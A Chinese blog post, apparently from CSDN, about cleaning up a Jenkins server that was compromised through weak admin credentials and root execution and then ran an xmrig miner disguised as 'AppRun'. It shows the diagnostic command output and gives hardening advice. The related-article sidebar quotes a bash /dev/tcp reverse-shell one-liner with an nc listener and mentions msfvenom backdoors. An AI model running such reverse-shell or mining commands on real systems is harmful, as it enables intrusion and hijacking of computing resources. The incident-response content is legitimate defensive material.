Jenkins反弹shell攻击(AppRun进程,xmrig)

最新推荐文章于 2024-04-23 21:45:00 发布
最新推荐文章于 2024-04-23 21:45:00 发布
阅读量2.6k 收藏
点赞数
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32642039/article/details/80353582
版权

一、服务器环境

Centos 7 2核4G 经典网络
Jenkins服务器

二、排查流程

1.top命令查看服务器负载

top - 16:58:25 up 164 days,  1:36,  3 users,  load average: 2.25, 2.49, 2.66
Tasks:  75 total,   2 running,  73 sleeping,   0 stopped,   0 zombie
%Cpu(s):  4.5 us,  0.1 sy,  0.0 ni, 95.3 id,  0.1 wa,  0.0 hi,  0.0 si,  0.1 st
KiB Mem :  1014968 total,   124920 free,   625608 used,   264440 buff/cache
KiB Swap:        0 total,        0 free,        0 used.   231436 avail Mem 

  PID USER      PR  NI    VIRT    RES    SHR S %CPU %MEM     TIME+ COMMAND                           
 4799 root      20   0  220228   4680    644 S 75.0  0.5  30:09.25 AppRun

2.搜索对应进程

[root@jekins df]# ps aux|grep 'AppRun'
root      4799 82.0  0.4 220228  4644 ?        Ssl  16:21  31:52 /tmp/df/AppRun -o pool.supportxmr.com:3333 -u 44jVsxXqbwWG8Yons62ZnM9nwyeChrtxDYFPs9W2jeKyhTxhdfNYaokcvfrsop5zMujJt2WKWihffjcZrnG99AEZLKQw1yz -p y --max-cpu-usage=50 -k -B --donate-level=1

查看目录结构

[root@jenkins df]# tree /tmp/df/
/tmp/df/
├── AppRun -> initd
├── doc
│   ├── libffi6
│   │   └── copyright
│   ├── libgcrypt11
│   │   └── copyright
│   ├── libgnutls26
│   │   └── copyright
│   ├── libmicrohttpd10
│   │   └── copyright
│   └── libtasn1-6-dev
│       └── copyright
├── du.sh
├── initd
├── lib
│   ├── libffi.so.6
│   ├── libgcrypt.so.11
│   ├── libgnutls.so.26
│   ├── libmicrohttpd.so.10
│   └── libtasn1.so.6
├── lib64
├── usr
│   └── lib
├── xmrig.desktop
└── xmrig.png

三、解决问题

1.到这里基本确认被当成矿机了,百度看了确认了。
【预警通告】近期大量WebLogic主机感染挖矿病毒

2.使用lsof定位进程,可以看到本机的34214一直在对香港的ip进行请求。
[root@jenkins df]# lsof -i|grep ‘AppRun’
AppRun 4799 root 11u IPv4 31619280 0t0 TCP jekins:34214->103.253.40.189:dec-notes (ESTABLISHED)
这里写图片描述

3.服务器对外提供服务的只有jenkins,查看jenkins目录。8.6G,一只在被挖矿程序疯狂下载war包。

[root@jekins ~]# du -ah --max-depth=1 .
60K ./.cache
8.6G    ./.jenkins
4.0K    ./.viminfo
4.0K    ./.bash_history
12K ./.ssh
8.0K    ./.pip
4.0K    ./.bashrc
4.0K    ./.bash_profile
15G .

4.这台服务器是开发自用,排查发现存在以下问题
1.安全组不设置
2.使用root启动jenkins
3.密码弱口令
清楚挖矿程序流程应当先清楚程序进程,然后检查crontab和秘钥,最后做安全策略。下面将复现攻击流程和进行安全策略调整。

四、反思

1.首先复现攻击流程,使用Jenkins的人都知道。Jenkins是自带脚本命令行的,如果以root权限运行Jenkins,cli窗口可以执行任何命令。对比redis反弹shell攻击,Jenkins的反弹shell攻击类似,给个链接大家可以自己看,。
jenkins拿shell的方法

2.反思
a.服务器被设置了账号admin,密码admin这是非常糟糕的。有目的的人一扫描就可以拿到权限。
b.安全组对所有IP开放,给了攻击者机会。
c.是以root账号运行服务,对方通过漏洞就黑了整个系统。可以这么说,禁止root运行程序,几乎可以避免反弹shell。
d.建议不要直接java -jar jenkins.war,应当用tomcat运行,在前端加上访问认证,和对cli页面的url进行匹配跳转403.

十月鱼
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
记一次Jenkins入侵攻击防范
极客栈
10-24 2042
#!/bin/bash threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1); hostHash=$(hostname -f | md5sum | cut -c1-8); echo "${hostHash} - ${threadCount}"; _curl () { read p...
Jenkins未授权 反弹shell
weixin_39664643的博客
06-23 1747
Jenkins 未授权 反弹shell 漏洞原理: 通过msfvenom生成python后门并执行,反弹shell 漏洞环境: 攻击: kali 192.168.109.128 目标:Win10 默认安装 jenkins jenkins清华镜像 在Windows平台安装Jenkins:默认部分插件有可能因为网络安装失败,不影响漏洞复现~ 复现步骤: 所有步骤均在kali中完成 Kali中使用MSF生成python后门s.py,并在此目录开启web服务 msfvenom -p python/meter
反弹shell 看这一篇就够了
m0_69043895的博客
04-21 1460
在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。SSL协议要求建立在可靠的传输层协议(TCP)之上。SSL协议的优势在于它是与应用层协议独立无关的,高层的应用层协议(例如:HTTP,FTP,TELNET等)能透明地建立于SSL协议之上。SSL协议在应用层协议通信之前就已经完成加密算法、通信密钥的协商及服务器认证工作。在此之后应用层协议所传送的数据都会被加密,从而保证通信的私密性。
Jenkins未授权访问+命令执行反弹shell(复现)
weixin_54227009的博客
05-22 1312
我们大致了解过皮毛,可以在idea新建项目,经过简单调整格式,本地测试可以运行,浏览器访问发现没有Jenkins没有设置密码,直接就未授权进后台了。1、打内网的时候通过fscan扫到了一台Jenkins服务的机子。3.3在Jenkins的脚本命令行执行反弹shell命令。3.2在菱角社区搞一个反弹shell命令在线生成。2、在系统管理->脚本命令行。3.1在kali上设置监听。
反弹shell
INK
12-07 4723
反弹shell
网络安全-反弹shell详解(攻击,检测与防御)
最新发布
2401_84466336的博客
04-23 2847
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
jenkins shell 命令,自动部署命令.txt
07-13
放在Post Steps 的shell命令 ,一键自动部署(2021最新版)
jenkins 部署启动项目后 杀死子进程
01-09
前言 最近在鼓捣 jenkins 的时候,遇到了很多问题,这个...正如题目写的,就是 jenkins 在构建结束之后,会杀死它创建的子进程,所以你写的后台执行的脚本也会被kill掉。 方案一: # 在执行的脚本前边加入:不要杀
使用Jenkins实现移动APP持续集成构建检查
02-25
通过《使用Jenkins搭建iOS/Android持续集成打包平台》和《关于持续集成打包平台的Jenkins配置和构建脚本实现细节》两篇文章,我们已经在原理概念和实践操作两个层面掌握了如何搭建一个完整的持续集成打包平台。...
jenkins的windows节点执行shell脚本
01-07
迁移jenkins时,需要依赖windows的节点,在网上查了资料装好以后,接下来简直就是噩梦,因为没有人指导,在项目build上70多次的时候终于成功。其实遇到的问题可能很简单,但是只有在你碰壁很多次后才能找到原因。在...
rancher2.2 shell jenkins k8s 自动化部署
02-19
包含NodePort,HostPort,ClusterIp几种方式自动化部署脚本。
[网络安全自学篇] 五十八.Windows安全缺陷利用之再看CVE-2019-0708及反弹shell防御措施
热门推荐
杨秀璋的专栏
03-12 1万+
很早之前,我分享过一篇名叫 “Windows远程桌面服务漏洞(CVE-2019-0708)复现及详解” 的博客,主要采用Python代码让目标XP系统蓝屏,但写得不太完善。作者最近一直在学习Windows漏洞利用,包括Msfconsole渗透工具及shell获取,这里我们也回过头来继续分析CVE-2019-0708,利用RDP(EXP)和Metasploit工具反弹shell,并实现Win7远程桌面攻击。希望文章对您有所帮助~
阿里云提示进程异常行为反弹SHELL 该怎么处理
网站安全专家
09-01 1401
也希望我们的解决过程分享,能帮到更多的人。当天我们SINESAFE收到客户的电话咨询,客户的平台、APP和H5端、以及后台遭到黑客入侵,并篡改了数据库里面的数据,导致平台的损失过万,详细询问了客户的平台架构以及部署的服务器数量,发现客户用的是Thinkphp架构开发,APP的API接口和H5端以及后台管理都是在该架构的基础上开发的,因为这套代码是客户从买来后找的第三方公司进行的二次开发,第三方开发公司对里面的代码后门并不清楚,很多低价卖源码的,肯定是有利益可图的。...
反弹shell原理与实现
悦分享
08-02 3308
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。...
jenkins漏洞导致服务器中了挖矿病毒!cpu飙高351%!看我如何消灭它!
架构师小秘圈
05-14 5713
作者:SilentBillows,资深Java工程师,架构师小秘圈特约作者!欢迎大家投稿,在后台回复投稿即可!一, 定位问题1.发现cpu异常,查看对应的进程信息[roo...
linux 常用反弹shell小记
weixin_30535167的博客
02-13 195
在渗透测试过程中由于防火墙和其它安全防御措施,很多服务器只能单向向外访问,不能被访问,我们常常需要反弹shell。 1.bash反弹shell 本地开启监听 nc -lvvp 8080 受害主机命令 bash -i >& /dev/tcp/192.168.109.131/8080 0>&1 收到反弹回来的shell 2. ...
libgcc_a挖矿木马应急响应及分析
weixin_40642404的博客
05-19 2583
libgcc_a挖矿木马应急响应及分析
jenkins执行shell脚本
05-16
你可以在 Jenkins 中使用“Execute shell”步骤来执行 Shell 脚本。以下是一个简单的例子: 1. 打开 Jenkins 任务并选择“Configure”选项。 2. 在“Build”部分下,点击“Add build step”按钮并选择“Execute ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值